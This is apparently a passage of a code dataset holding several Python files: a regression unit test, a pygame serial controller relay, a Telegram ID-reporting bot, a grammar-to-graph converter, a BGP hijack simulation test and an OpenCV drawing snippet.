"keras.optimizers.RMSprop", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "186429426", "text": "import sys\nsys.path.append('../../')\n\nimport data\nimport regression\n\nimport numpy as np\nimport unittest\n\nclass TestObjectives(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.easy_fname = '../testdata/test_easyleastsquareslinear.csv'\n\t\tself.nonnumeric_fname = '../testdata/test_nonnumeric.csv'\n\t\tself.standard_fname = '../testdata/test_leastsquares.csv'\n\n\tdef testLeastSquares_nonNumeric(self):\n\t\ttestdataset = data.DataSet(self.nonnumeric_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\tself.assertRaises(ValueError, testregression.least_squares, 'text1', 'text2')\n\n\tdef testLeastSquares_easy(self):\n\t\ttestdataset = data.DataSet(self.easy_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tself.assertEqual(int(testregression.b1), 1)\n\t\tself.assertEqual(int(testregression.b0), 0)\n\n\tdef testLeastSquares(self):\n\t\ttestdataset = data.DataSet(self.standard_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tself.assertTrue(abs(testregression.b1 - 1.7) < 0.0001)\n\t\tself.assertTrue(abs(testregression.b0 - 1.9) < 0.0001)\n\n\tdef testPrediction_easy(self):\n\t\ttestdataset = data.DataSet(self.easy_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tprediction = testregression.predict(1)\n\t\tself.assertEqual(int(prediction), 1)\n\n\tdef testPrediction(self):\n\t\ttestdataset = data.DataSet(self.standard_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tprediction = testregression.predict(0)\n\t\tself.assertTrue(abs(prediction - 1.9) < 0.0001)\n\nif __name__ == '__main__':\n\tunittest.main()", "sub_path": "tests/testcases/test_regression.py", "file_name": "test_regression.py", "file_ext": "py", "file_size_in_byte": 1780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "data.DataSet", "line_number": 18, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 19, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 24, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 25, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 32, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 33, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 40, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 41, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 48, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 49, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "26988960", "text": "import sys\nimport time\n\nimport pygame\nfrom serial.tools import list_ports\n\nfrom switchlib import InputManager\nfrom seriallib import SerialManager, Payload\n\nBAUD = 38400\n\nUPDATES_PER_SECOND = 60\n\npayload = Payload()\n\ndef getPortFromUser():\n\tportList = list(list_ports.grep(\"\"))\n\tif len(portList) == 0:\n\t\traise LookupError(\"Unable to detect Serial Device.\")\n\tindexPortListString = [f\"Index: {index}, Port: {port.device}, Description: {port.description}\"\n\t\t\t\t\t\t for index, port in enumerate(portList)]\n\tprint(indexPortListString)\n\twhile True:\n\t\tind = input(\"What port index should be used? \")\n\t\tif not str.isdigit(ind):\n\t\t\tprint(f\"Value given is not a digit\")\n\t\telif not (0 <= int(ind) < len(portList)):\n\t\t\tprint(\"Value given is not an index in the list\")\n\t\telse:\n\t\t\treturn portList[int(ind)].device\n\n\n\n\nwinDim = (640, 480)\nlockMouse = False\nmouseSens = (2, 2)\nmouseDelta = (0, 0)\n\ninMan = InputManager(\"controllerMapping.csv\")\n\npygame.init()\n\nscreen = pygame.display.set_mode(winDim)\n\nmyFont = pygame.font.SysFont(\"Arial\", 16, bold=True)\n\ntextColor = pygame.Color(255, 255, 255)\nscreenFillColor = pygame.Color(0, 0, 0)\n\nkeysDown = []\n\nwith SerialManager(getPortFromUser(), BAUD) as serialMan:\n\twhile True:\n\t\tpayload.resetAllInputs()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tserialMan.flush()\n\t\t\t\tsys.exit()\n\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tserialMan.flush()\n\t\t\t\t\tsys.exit()\n\t\t\t\telif event.key == pygame.K_TAB:\n\t\t\t\t\tlockMouse = not lockMouse\n\t\t\t\telif not event.key in keysDown:\n\t\t\t\t\tkeysDown.append(event.key)\n\n\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\tif event.key in keysDown:\n\t\t\t\t\tkeysDown.remove(event.key)\n\t\t\t\n\t\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\t\tmouseDelta = event.rel\n\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tkeyStr = f\"m{event.button}\"\n\t\t\t\tif not keyStr in keysDown:\n\t\t\t\t\tkeysDown.append(keyStr)\n\n\t\t\telif event.type == pygame.MOUSEBUTTONUP:\n\t\t\t\tkeyStr = f\"m{event.button}\"\n\t\t\t\tif keyStr in keysDown:\n\t\t\t\t\tkeysDown.remove(keyStr)\n\n\t\tinMan.processInputs(payload, keysDown,\n\t\t\t\t(mouseDelta[0] * mouseSens[0], -mouseDelta[1] * mouseSens[1]))\n\n\t\tif lockMouse and pygame.mouse.get_focused():\n\t\t\t\tpygame.mouse.set_pos(winDim[0] / 2, winDim[1] / 2)\n\t\t\t\tpygame.event.get(pygame.MOUSEMOTION)\n\t\tmouseDelta = (0, 0)\n\n\t\tscreen.fill(screenFillColor)\n\n\t\tscreen.blit(myFont.render(f\"Sending:{str(payload)}\", True, textColor), (0,0))\n\t\tscreen.blit(myFont.render(f\"Receiving:{serialMan.readPortAsIntArr()}\", True, textColor), (0,20))\n\n\t\tpygame.display.flip()\n\t\tserialMan.write(payload.asByteArray())\n\t\ttime.sleep(1/UPDATES_PER_SECOND)\n", "sub_path": "Python/example.py", "file_name": "example.py", "file_ext": "py", "file_size_in_byte": 2657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seriallib.Payload", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.grep", "line_number": 17, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 17, "usage_type": "name"}, {"api_name": "switchlib.InputManager", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 49, "usage_type": "call"}, {"api_name": "seriallib.SerialManager", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.K_TAB", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_focused", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_pos", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 102, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 102, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "39537078", "text": "#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport cherrypy\nimport telebot\nfrom telebot import types\n\n\nAPI_TOKEN = 'Telegram_bot_api_token'\n\n# Not using certificate, because this bot is behind other CherryPy server or nginx\nWEBHOOK_PORT = 1234 \nWEBHOOK_LISTEN = '0.0.0.0'\n\nbot = telebot.TeleBot(API_TOKEN)\n\n\n# WebhookServer, process webhook calls\nclass WebhookServer(object):\n @cherrypy.expose\n def index(self):\n if 'content-length' in cherrypy.request.headers and \\\n 'content-type' in cherrypy.request.headers and \\\n cherrypy.request.headers['content-type'] == 'application/json':\n length = int(cherrypy.request.headers['content-length'])\n json_string = cherrypy.request.body.read(length)\n json_string = json_string.decode(\"utf-8\")\n update = telebot.types.Update.de_json(json_string)\n if update.message:\n bot.process_new_messages([update.message])\n if update.inline_query:\n bot.process_new_inline_query([update.inline_query])\n return ''\n else:\n raise cherrypy.HTTPError(403)\n \n \n@bot.message_handler(commands=[\"start\"])\ndef cmd_start(message):\n if message.chat.type == 'private':\n bot.send_message(message.chat.id, 'Your personal ID is *{0!s}*\\nNever tell it to whom you don\\'t trust!\\nYou can also add me to any group to know its ID or send me any type of media to get its `file_id`\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n elif message.chat.type == \"group\" or message.chat.type == \"supergroup\":\n bot.reply_to(message, 'This group\\'s ID is *{0!s}*\\nTo view your personal ID, please, open a separate chat with me.\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n\n \n@bot.message_handler(content_types = ['text'])\ndef parse_text(message):\n # Send chat_id if private chat\n if message.chat.type == 'private':\n bot.send_message(message.chat.id, 'Your personal ID is *{0!s}*\\nNever tell it to whom you don\\'t trust!\\nYou can also add me to any group to know its ID or send me any type of media to get its `file_id`\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n # Send both chat_id and user's own id if group chat\n elif message.chat.type == \"group\" or message.chat.type == \"supergroup\":\n bot.reply_to(message, 'This group\\'s ID is *{0!s}*\\nTo view your personal ID, please, open a separate chat with me.\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n \n \n@bot.message_handler(content_types = ['sticker'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This sticker ID is:\\n{0!s}'.format(message.sticker.file_id))\n \n\n@bot.message_handler(content_types = ['photo'])\n# Send file_id of largest copy of incoming photo\ndef send_sticker_id(message):\n bot.reply_to(message, 'This photo ID is:\\n{0!s}'.format(message.photo[-1].file_id))\n \n\n@bot.message_handler(content_types = ['audio'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This audio ID is:\\n{0!s}'.format(message.audio.file_id))\n \n \n@bot.message_handler(content_types = ['video'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This video ID is:\\n{0!s}'.format(message.video.file_id))\n \n \n@bot.message_handler(content_types = ['document'])\ndef send_document_id(message):\n bot.reply_to(message, 'This document ID is:\\n{0!s}'.format(message.document.file_id))\n \n \n@bot.message_handler(content_types = ['voice'])\ndef send_voice_id(message):\n bot.reply_to(message, 'This voice ID is:\\n{0!s}'.format(message.voice.file_id))\n \n \n@bot.inline_handler(lambda query: True)\ndef query_zero(query):\n try:\n result = types.InlineQueryResultArticle(\n id='1',\n title=\"Your ID is {!s}\".format(query.from_user.id),\n description=\"Click to send your ID to current chat.\",\n input_message_content=types.InputTextMessageContent(\n message_text=\"My personal ID is *{!s}*\".format(query.from_user.id),\n parse_mode=\"Markdown\"\n ),\n thumb_url=\"https://pp.vk.me/c629419/v629419512/2b8a4/ePHZEaeRGbU.jpg\",\n thumb_width=64,\n thumb_height=64\n )\n # Cache for everyone personally for 10 days\n bot.answer_inline_query(query.id, [result], cache_time=864000, is_personal=True)\n except Exception as e:\n print(e)\n \n \nif __name__ == '__main__':\n # Start cherrypy server\n cherrypy.config.update({\n 'server.socket_host': WEBHOOK_LISTEN,\n 'server.socket_port': WEBHOOK_PORT\n })\n\n cherrypy.quickstart(WebhookServer(), '/', {'/': {}})", "sub_path": "pyTelegramBotAPI/webhook_whatsmyid.py", "file_name": "webhook_whatsmyid.py", "file_ext": "py", "file_size_in_byte": 5171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "telebot.TeleBot", "line_number": 15, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cherrypy.request.body.read", "line_number": 26, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 26, "usage_type": "attribute"}, {"api_name": "telebot.types.Update.de_json", "line_number": 28, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cherrypy.HTTPError", "line_number": 35, "usage_type": "call"}, {"api_name": "cherrypy.expose", "line_number": 20, "usage_type": "attribute"}, {"api_name": "telebot.types.InlineQueryResultArticle", "line_number": 90, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 90, "usage_type": "name"}, {"api_name": "telebot.types.InputTextMessageContent", "line_number": 94, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 94, "usage_type": "name"}, {"api_name": "cherrypy.config.update", "line_number": 110, "usage_type": "call"}, {"api_name": "cherrypy.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cherrypy.quickstart", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "264302906", "text": "from .cfg_pb2 import *\nfrom google.protobuf.text_format import Parse\nfrom google.protobuf.json_format import MessageToJson, MessageToDict\nimport json\n\nwith open('scripts/cfg.json', 'r') as f:\n \n cfg: ContextFreeGrammar = ContextFreeGrammar()\n Parse(f.read(), cfg)\n # print(cfg)\n\n cfg_dict = MessageToDict(cfg)\n # print(cfg)\n\n\n nodes = []\n\n x_axis = 10\n\n y_axis_terminal = 100\n y_axis_normal = 0\n\n\n for node in cfg_dict['nodes']:\n # print(node)\n n_node = {}\n n_node['id'] = str(node['canonicalId'])\n x_loc = x_axis\n y_loc = y_axis_normal\n if 'possibleValues' in node:\n n_node['title'] = ' '.join(node['possibleValues'])\n else:\n n_node['title'] = node['name']\n # n_node['color'] = 'lightgreen'\n\n # if node['isTerminalNode']:\n # y_loc = y_axis_terminal\n\n # x_axis += 100\n\n n_node['x'] = x_loc\n n_node['y'] = y_loc\n # n_node['type'] = 'SKINNY_TYPE'\n nodes.append(n_node)\n\n edges = []\n edge_key = 0\n for edge in cfg_dict['productionRules']:\n for adj_node in edge['adjacentNodes']:\n n_edge = {}\n edge_key -= 1\n # n_edge['key'] = edge_key\n n_edge['source'] = str(edge['node1'])\n n_edge['target'] = str(adj_node)\n n_edge['type'] = \"EMPTY_EDGE_TYPE\"\n\n edges.append(n_edge)\n\n\n\n\n final_js = {\n 'nodes': nodes,\n 'edges': edges\n }\n\n \n\n\n\n with open('/Users/pranavsharma/br/side-tools/viz-fsa/src/graph.json', 'w') as f2:\n\n json.dump(final_js, f2)\n # f2.write(MessageToJson(cfg))\n\n\n \n", "sub_path": "scripts/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1673, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "google.protobuf.text_format.Parse", "line_number": 9, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.MessageToDict", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "320457902", "text": "import pytest\n\nfrom lib_caida_collector import PeerLink, CustomerProviderLink as CPLink\n\nfrom ..utils import run_example, HijackLocalRib\n\nfrom ....enums import ASNs, Prefixes, Timestamps, ROAValidity, Relationships\nfrom ....simulator.attacks import SubprefixHijack\nfrom ....engine import LocalRib\nfrom ....engine.bgp_policy import BGPPolicy\nfrom ....engine.bgp_ribs_policy import BGPRIBSPolicy\nfrom ....announcement import Announcement\n\n@pytest.mark.parametrize(\"BasePolicyCls\", [BGPPolicy, BGPRIBSPolicy])\ndef test_hidden_hijack_bgp(BasePolicyCls):\n r\"\"\"Hidden hijack example with BGP\n Figure 1a in our ROV++ paper\n\n 1\n \\\n 2 - 3\n / \\\n 777 666\n \"\"\"\n\n\n # Graph data\n peers = [PeerLink(2, 3)]\n customer_providers = [CPLink(provider_asn=1, customer_asn=2),\n CPLink(provider_asn=2, customer_asn=ASNs.VICTIM.value),\n CPLink(provider_asn=3, customer_asn=ASNs.ATTACKER.value)]\n # Number identifying the type of AS class\n as_policies = {asn: BasePolicyCls for asn in\n list(range(1, 4)) + [ASNs.VICTIM.value, ASNs.ATTACKER.value]}\n\n vic_kwargs = {\"prefix\": Prefixes.PREFIX.value,\n \"timestamp\": Timestamps.VICTIM.value,\n \"seed_asn\": None,\n \"roa_validity\": ROAValidity.VALID}\n atk_kwargs = {\"prefix\": Prefixes.SUBPREFIX.value,\n \"timestamp\": Timestamps.ATTACKER.value,\n \"seed_asn\": None,\n \"roa_validity\": ROAValidity.VALID}\n\n\n\n # Local RIB data\n local_ribs = {\n 1: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(1, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.CUSTOMERS,\n **vic_kwargs)}),\n 2: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(2, ASNs.VICTIM.value),\n recv_relationship=Relationships.CUSTOMERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(2, 3, ASNs.ATTACKER.value),\n recv_relationship=Relationships.PEERS,\n **atk_kwargs)}),\n 3: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(3, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.PEERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(3, ASNs.ATTACKER.value),\n recv_relationship=Relationships.CUSTOMERS,\n **atk_kwargs)}),\n ASNs.VICTIM.value:\n LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(ASNs.VICTIM.value,),\n recv_relationship=Relationships.ORIGIN,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(ASNs.VICTIM.value,\n 2,\n 3,\n ASNs.ATTACKER.value),\n recv_relationship=Relationships.CUSTOMERS,\n **atk_kwargs)}),\n ASNs.ATTACKER.value:\n LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(ASNs.ATTACKER.value,3, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.PROVIDERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(ASNs.ATTACKER.value,),\n recv_relationship=Relationships.ORIGIN,\n **atk_kwargs)}),\n }\n\n run_example(peers=peers,\n customer_providers=customer_providers,\n as_policies=as_policies,\n announcements=SubprefixHijack().announcements,\n local_ribs=local_ribs)\n", "sub_path": "lib_checkbook/tests/system_tests/bgp/test_hidden_hijack_bgp.py", "file_name": "test_hidden_hijack_bgp.py", "file_ext": "py", "file_size_in_byte": 4508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "lib_caida_collector.PeerLink", "line_number": 28, "usage_type": "call"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 29, "usage_type": "call"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 30, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 30, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 30, "usage_type": "name"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 31, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 31, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 31, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 34, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 34, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 34, "usage_type": "attribute"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 36, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 36, "usage_type": "name"}, {"api_name": "enums.Timestamps.VICTIM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "enums.Timestamps", "line_number": 37, "usage_type": "name"}, {"api_name": "enums.ROAValidity.VALID", "line_number": 39, "usage_type": "attribute"}, {"api_name": "enums.ROAValidity", "line_number": 39, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 40, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 40, "usage_type": "name"}, {"api_name": "enums.Timestamps.ATTACKER", "line_number": 41, "usage_type": "attribute"}, {"api_name": "enums.Timestamps", "line_number": 41, "usage_type": "name"}, {"api_name": "enums.ROAValidity.VALID", "line_number": 43, "usage_type": "attribute"}, {"api_name": "enums.ROAValidity", "line_number": 43, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 64, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 74, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 74, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 49, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 49, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 49, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 49, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 49, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 50, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 52, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 52, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 52, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 55, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 55, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 52, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 52, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 52, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 53, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 55, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 55, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 55, "usage_type": "name"}, {"api_name": "enums.Relationships.PEERS", "line_number": 56, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 56, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 58, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 58, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 58, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 61, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 61, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 58, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 58, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 58, "usage_type": "name"}, {"api_name": "enums.Relationships.PEERS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 59, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 61, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 61, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 61, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 62, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 65, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 65, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 68, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 68, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 65, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 65, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 65, "usage_type": "name"}, {"api_name": "enums.Relationships.ORIGIN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 66, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 68, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 68, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 68, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 71, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 71, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 72, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 72, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 75, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 75, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 78, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 78, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 75, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 75, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.Relationships.PROVIDERS", "line_number": 76, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 76, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 78, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 78, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 78, "usage_type": "name"}, {"api_name": "enums.Relationships.ORIGIN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 79, "usage_type": "name"}, {"api_name": "utils.run_example", "line_number": 83, "usage_type": "call"}, {"api_name": "simulator.attacks.SubprefixHijack", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 14, "usage_type": "attribute"}, {"api_name": "engine.bgp_policy.BGPPolicy", "line_number": 14, "usage_type": "name"}, {"api_name": "engine.bgp_ribs_policy.BGPRIBSPolicy", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "349225895", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('C:\\\\Users\\\\Aman Deep Singh\\\\Downloads\\\\Images\\\\github.jpg', cv2.IMREAD_COLOR)\n\n# Drawing using CV2 will be optimal compared to using matplotlib to do so\n# arguments (where, (x0, y0), (x1, y1), (color in BGR), linewidth)\ncv2.line(img, (0, 0), (150, 150), (200, 100, 50), 15)\n# arguments (where, (top 